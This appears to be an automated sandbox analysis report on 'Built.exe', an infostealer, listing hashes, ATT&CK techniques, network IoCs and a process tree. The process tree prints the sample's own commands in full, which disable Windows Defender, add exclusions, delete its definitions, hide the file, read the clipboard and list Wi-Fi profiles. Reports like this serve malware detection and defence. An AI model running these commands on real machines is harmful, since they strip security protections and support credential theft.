2d777e9ec797cf580abc67e23fc40778d1794c367c1faef4a4e7d90872111a3f

Analysis

max time kernel
329s
max time network
319s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18-12-2024 23:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

7.5MB
MD5

32de27aa1388746d35efde69422ef583
SHA1

90a37c188626580fe58fd67cfa5a5089aa3fa8fa
SHA256

2d777e9ec797cf580abc67e23fc40778d1794c367c1faef4a4e7d90872111a3f
SHA512

ce1c966e95e6c64dd58208ba9ff4cf6ff212c38aa25ad6542b293feb6a5c6215553f07999a620a2c4e5ba333e6eb726c6b567037d024b27f253970566b024e23
SSDEEP

196608:R3hhOZ5urErvI9pWjg/Qc+4o673pNrabenyzWtPMYnNcsg:5E5urEUWjZZ4dDLIeyzWtPTNzg

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2096	powershell.exe
2748	powershell.exe
3420	powershell.exe
3164	powershell.exe
3956	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
936	cmd.exe
3116	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4476	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4928	Built.exe
4928	Built.exe
4928	Built.exe
4928	Built.exe
4928	Built.exe
4928	Built.exe
4928	Built.exe
4928	Built.exe
4928	Built.exe
4928	Built.exe
4928	Built.exe
4928	Built.exe
4928	Built.exe
4928	Built.exe
4928	Built.exe
4928	Built.exe
4928	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	discord.com
23	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
2760	tasklist.exe
2856	tasklist.exe
2776	tasklist.exe
2836	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4960	cmd.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b8d-21.dat	upx
behavioral2/memory/4928-25-0x00007FFD35FC0000-0x00007FFD36685000-memory.dmp	upx
behavioral2/files/0x000a000000023b80-27.dat	upx
behavioral2/memory/4928-30-0x00007FFD4A490000-0x00007FFD4A4B5000-memory.dmp	upx
behavioral2/files/0x000a000000023b8b-31.dat	upx
behavioral2/memory/4928-48-0x00007FFD4C150000-0x00007FFD4C15F000-memory.dmp	upx
behavioral2/files/0x000a000000023b87-47.dat	upx
behavioral2/files/0x000a000000023b86-46.dat	upx
behavioral2/files/0x000a000000023b85-45.dat	upx
behavioral2/files/0x000a000000023b84-44.dat	upx
behavioral2/files/0x000a000000023b83-43.dat	upx
behavioral2/files/0x000a000000023b82-42.dat	upx
behavioral2/files/0x000a000000023b81-41.dat	upx
behavioral2/files/0x000a000000023b7f-40.dat	upx
behavioral2/files/0x000b000000023b92-39.dat	upx
behavioral2/files/0x000a000000023b91-38.dat	upx
behavioral2/files/0x000a000000023b90-37.dat	upx
behavioral2/files/0x000a000000023b8c-34.dat	upx
behavioral2/files/0x000a000000023b8a-33.dat	upx
behavioral2/memory/4928-54-0x00007FFD45940000-0x00007FFD4596D000-memory.dmp	upx
behavioral2/memory/4928-56-0x00007FFD45920000-0x00007FFD4593A000-memory.dmp	upx
behavioral2/memory/4928-58-0x00007FFD45330000-0x00007FFD45354000-memory.dmp	upx
behavioral2/memory/4928-60-0x00007FFD35B90000-0x00007FFD35D0F000-memory.dmp	upx
behavioral2/memory/4928-64-0x00007FFD46500000-0x00007FFD4650D000-memory.dmp	upx
behavioral2/memory/4928-62-0x00007FFD45780000-0x00007FFD45799000-memory.dmp	upx
behavioral2/memory/4928-66-0x00007FFD452F0000-0x00007FFD45323000-memory.dmp	upx
behavioral2/memory/4928-74-0x00007FFD4A490000-0x00007FFD4A4B5000-memory.dmp	upx
behavioral2/memory/4928-73-0x00007FFD35590000-0x00007FFD35AB9000-memory.dmp	upx
behavioral2/memory/4928-71-0x00007FFD35AC0000-0x00007FFD35B8D000-memory.dmp	upx
behavioral2/memory/4928-70-0x00007FFD35FC0000-0x00007FFD36685000-memory.dmp	upx
behavioral2/memory/4928-76-0x00007FFD45040000-0x00007FFD45054000-memory.dmp	upx
behavioral2/memory/4928-81-0x00007FFD34EB0000-0x00007FFD34FCA000-memory.dmp	upx
behavioral2/memory/4928-80-0x00007FFD45C70000-0x00007FFD45C7D000-memory.dmp	upx
behavioral2/memory/4928-79-0x00007FFD45940000-0x00007FFD4596D000-memory.dmp	upx
behavioral2/memory/4928-106-0x00007FFD45330000-0x00007FFD45354000-memory.dmp	upx
behavioral2/memory/4928-276-0x00007FFD452F0000-0x00007FFD45323000-memory.dmp	upx
behavioral2/memory/4928-278-0x00007FFD35AC0000-0x00007FFD35B8D000-memory.dmp	upx
behavioral2/memory/4928-294-0x00007FFD35590000-0x00007FFD35AB9000-memory.dmp	upx
behavioral2/memory/4928-308-0x00007FFD4A490000-0x00007FFD4A4B5000-memory.dmp	upx
behavioral2/memory/4928-321-0x00007FFD34EB0000-0x00007FFD34FCA000-memory.dmp	upx
behavioral2/memory/4928-313-0x00007FFD35B90000-0x00007FFD35D0F000-memory.dmp	upx
behavioral2/memory/4928-307-0x00007FFD35FC0000-0x00007FFD36685000-memory.dmp	upx
behavioral2/memory/4928-351-0x00007FFD45920000-0x00007FFD4593A000-memory.dmp	upx
behavioral2/memory/4928-352-0x00007FFD45330000-0x00007FFD45354000-memory.dmp	upx
behavioral2/memory/4928-350-0x00007FFD34EB0000-0x00007FFD34FCA000-memory.dmp	upx
behavioral2/memory/4928-349-0x00007FFD4C150000-0x00007FFD4C15F000-memory.dmp	upx
behavioral2/memory/4928-348-0x00007FFD4A490000-0x00007FFD4A4B5000-memory.dmp	upx
behavioral2/memory/4928-347-0x00007FFD35590000-0x00007FFD35AB9000-memory.dmp	upx
behavioral2/memory/4928-345-0x00007FFD45C70000-0x00007FFD45C7D000-memory.dmp	upx
behavioral2/memory/4928-344-0x00007FFD45040000-0x00007FFD45054000-memory.dmp	upx
behavioral2/memory/4928-342-0x00007FFD35AC0000-0x00007FFD35B8D000-memory.dmp	upx
behavioral2/memory/4928-341-0x00007FFD452F0000-0x00007FFD45323000-memory.dmp	upx
behavioral2/memory/4928-340-0x00007FFD46500000-0x00007FFD4650D000-memory.dmp	upx
behavioral2/memory/4928-339-0x00007FFD45780000-0x00007FFD45799000-memory.dmp	upx
behavioral2/memory/4928-338-0x00007FFD35B90000-0x00007FFD35D0F000-memory.dmp	upx
behavioral2/memory/4928-335-0x00007FFD45940000-0x00007FFD4596D000-memory.dmp	upx
behavioral2/memory/4928-332-0x00007FFD35FC0000-0x00007FFD36685000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1188	cmd.exe
2468	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
184	cmd.exe
4348	netsh.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2828	WMIC.exe
3956	WMIC.exe
2000	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3076	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133790381292546231"	chrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2468	PING.EXE

Suspicious behavior: EnumeratesProcesses 41 IoCs

pid	Process
3420	powershell.exe
3420	powershell.exe
2096	powershell.exe
2096	powershell.exe
2748	powershell.exe
2748	powershell.exe
3116	powershell.exe
3116	powershell.exe
3356	powershell.exe
3356	powershell.exe
3116	powershell.exe
3356	powershell.exe
3164	powershell.exe
3164	powershell.exe
4732	powershell.exe
4732	powershell.exe
3956	powershell.exe
3956	powershell.exe
60	powershell.exe
60	powershell.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
4768	chrome.exe
4768	chrome.exe
1888	chrome.exe
1888	chrome.exe
1888	chrome.exe
1888	chrome.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
660	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2972	WMIC.exe
Token: SeSecurityPrivilege	2972	WMIC.exe
Token: SeTakeOwnershipPrivilege	2972	WMIC.exe
Token: SeLoadDriverPrivilege	2972	WMIC.exe
Token: SeSystemProfilePrivilege	2972	WMIC.exe
Token: SeSystemtimePrivilege	2972	WMIC.exe
Token: SeProfSingleProcessPrivilege	2972	WMIC.exe
Token: SeIncBasePriorityPrivilege	2972	WMIC.exe
Token: SeCreatePagefilePrivilege	2972	WMIC.exe
Token: SeBackupPrivilege	2972	WMIC.exe
Token: SeRestorePrivilege	2972	WMIC.exe
Token: SeShutdownPrivilege	2972	WMIC.exe
Token: SeDebugPrivilege	2972	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2972	WMIC.exe
Token: SeRemoteShutdownPrivilege	2972	WMIC.exe
Token: SeUndockPrivilege	2972	WMIC.exe
Token: SeManageVolumePrivilege	2972	WMIC.exe
Token: 33	2972	WMIC.exe
Token: 34	2972	WMIC.exe
Token: 35	2972	WMIC.exe
Token: 36	2972	WMIC.exe
Token: SeDebugPrivilege	2760	tasklist.exe
Token: SeDebugPrivilege	3420	powershell.exe
Token: SeIncreaseQuotaPrivilege	2972	WMIC.exe
Token: SeSecurityPrivilege	2972	WMIC.exe
Token: SeTakeOwnershipPrivilege	2972	WMIC.exe
Token: SeLoadDriverPrivilege	2972	WMIC.exe
Token: SeSystemProfilePrivilege	2972	WMIC.exe
Token: SeSystemtimePrivilege	2972	WMIC.exe
Token: SeProfSingleProcessPrivilege	2972	WMIC.exe
Token: SeIncBasePriorityPrivilege	2972	WMIC.exe
Token: SeCreatePagefilePrivilege	2972	WMIC.exe
Token: SeBackupPrivilege	2972	WMIC.exe
Token: SeRestorePrivilege	2972	WMIC.exe
Token: SeShutdownPrivilege	2972	WMIC.exe
Token: SeDebugPrivilege	2972	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2972	WMIC.exe
Token: SeRemoteShutdownPrivilege	2972	WMIC.exe
Token: SeUndockPrivilege	2972	WMIC.exe
Token: SeManageVolumePrivilege	2972	WMIC.exe
Token: 33	2972	WMIC.exe
Token: 34	2972	WMIC.exe
Token: 35	2972	WMIC.exe
Token: 36	2972	WMIC.exe
Token: SeDebugPrivilege	2096	powershell.exe
Token: SeIncreaseQuotaPrivilege	3956	WMIC.exe
Token: SeSecurityPrivilege	3956	WMIC.exe
Token: SeTakeOwnershipPrivilege	3956	WMIC.exe
Token: SeLoadDriverPrivilege	3956	WMIC.exe
Token: SeSystemProfilePrivilege	3956	WMIC.exe
Token: SeSystemtimePrivilege	3956	WMIC.exe
Token: SeProfSingleProcessPrivilege	3956	WMIC.exe
Token: SeIncBasePriorityPrivilege	3956	WMIC.exe
Token: SeCreatePagefilePrivilege	3956	WMIC.exe
Token: SeBackupPrivilege	3956	WMIC.exe
Token: SeRestorePrivilege	3956	WMIC.exe
Token: SeShutdownPrivilege	3956	WMIC.exe
Token: SeDebugPrivilege	3956	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3956	WMIC.exe
Token: SeRemoteShutdownPrivilege	3956	WMIC.exe
Token: SeUndockPrivilege	3956	WMIC.exe
Token: SeManageVolumePrivilege	3956	WMIC.exe
Token: 33	3956	WMIC.exe
Token: 34	3956	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe

Suspicious use of SendNotifyMessage 63 IoCs

pid	Process
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
2124	taskmgr.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe
4768	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 816 wrote to memory of 4928	816	Built.exe	83
PID 816 wrote to memory of 4928	816	Built.exe	83
PID 4928 wrote to memory of 1888	4928	Built.exe	84
PID 4928 wrote to memory of 1888	4928	Built.exe	84
PID 4928 wrote to memory of 656	4928	Built.exe	85
PID 4928 wrote to memory of 656	4928	Built.exe	85
PID 4928 wrote to memory of 4776	4928	Built.exe	88
PID 4928 wrote to memory of 4776	4928	Built.exe	88
PID 4928 wrote to memory of 1476	4928	Built.exe	90
PID 4928 wrote to memory of 1476	4928	Built.exe	90
PID 1476 wrote to memory of 2972	1476	cmd.exe	92
PID 1476 wrote to memory of 2972	1476	cmd.exe	92
PID 656 wrote to memory of 3420	656	cmd.exe	93
PID 656 wrote to memory of 3420	656	cmd.exe	93
PID 4776 wrote to memory of 2760	4776	cmd.exe	94
PID 4776 wrote to memory of 2760	4776	cmd.exe	94
PID 1888 wrote to memory of 2096	1888	cmd.exe	95
PID 1888 wrote to memory of 2096	1888	cmd.exe	95
PID 4928 wrote to memory of 2960	4928	Built.exe	97
PID 4928 wrote to memory of 2960	4928	Built.exe	97
PID 2960 wrote to memory of 2888	2960	cmd.exe	99
PID 2960 wrote to memory of 2888	2960	cmd.exe	99
PID 4928 wrote to memory of 868	4928	Built.exe	100
PID 4928 wrote to memory of 868	4928	Built.exe	100
PID 868 wrote to memory of 388	868	cmd.exe	102
PID 868 wrote to memory of 388	868	cmd.exe	102
PID 4928 wrote to memory of 3040	4928	Built.exe	103
PID 4928 wrote to memory of 3040	4928	Built.exe	103
PID 3040 wrote to memory of 3956	3040	cmd.exe	105
PID 3040 wrote to memory of 3956	3040	cmd.exe	105
PID 4928 wrote to memory of 4268	4928	Built.exe	106
PID 4928 wrote to memory of 4268	4928	Built.exe	106
PID 4268 wrote to memory of 2000	4268	cmd.exe	108
PID 4268 wrote to memory of 2000	4268	cmd.exe	108
PID 4928 wrote to memory of 4960	4928	Built.exe	109
PID 4928 wrote to memory of 4960	4928	Built.exe	109
PID 4928 wrote to memory of 1276	4928	Built.exe	111
PID 4928 wrote to memory of 1276	4928	Built.exe	111
PID 1276 wrote to memory of 2748	1276	cmd.exe	113
PID 1276 wrote to memory of 2748	1276	cmd.exe	113
PID 4960 wrote to memory of 2200	4960	cmd.exe	114
PID 4960 wrote to memory of 2200	4960	cmd.exe	114
PID 4928 wrote to memory of 4956	4928	Built.exe	115
PID 4928 wrote to memory of 4956	4928	Built.exe	115
PID 4928 wrote to memory of 2368	4928	Built.exe	116
PID 4928 wrote to memory of 2368	4928	Built.exe	116
PID 4956 wrote to memory of 2856	4956	cmd.exe	119
PID 4956 wrote to memory of 2856	4956	cmd.exe	119
PID 2368 wrote to memory of 2776	2368	cmd.exe	120
PID 2368 wrote to memory of 2776	2368	cmd.exe	120
PID 4928 wrote to memory of 4692	4928	Built.exe	121
PID 4928 wrote to memory of 4692	4928	Built.exe	121
PID 4692 wrote to memory of 4160	4692	cmd.exe	123
PID 4692 wrote to memory of 4160	4692	cmd.exe	123
PID 4928 wrote to memory of 936	4928	Built.exe	124
PID 4928 wrote to memory of 936	4928	Built.exe	124
PID 4928 wrote to memory of 3872	4928	Built.exe	125
PID 4928 wrote to memory of 3872	4928	Built.exe	125
PID 4928 wrote to memory of 2028	4928	Built.exe	128
PID 4928 wrote to memory of 2028	4928	Built.exe	128
PID 4928 wrote to memory of 184	4928	Built.exe	129
PID 4928 wrote to memory of 184	4928	Built.exe	129
PID 4928 wrote to memory of 3516	4928	Built.exe	132
PID 4928 wrote to memory of 3516	4928	Built.exe	132

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2200	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:816
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1888
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4776
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2960
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:868
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4268
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4960
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      4⤵
      Views/modifies file attributes
      PID:2200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌‍ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4956
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2368
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4692
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:936
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3872
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2028
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:184
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
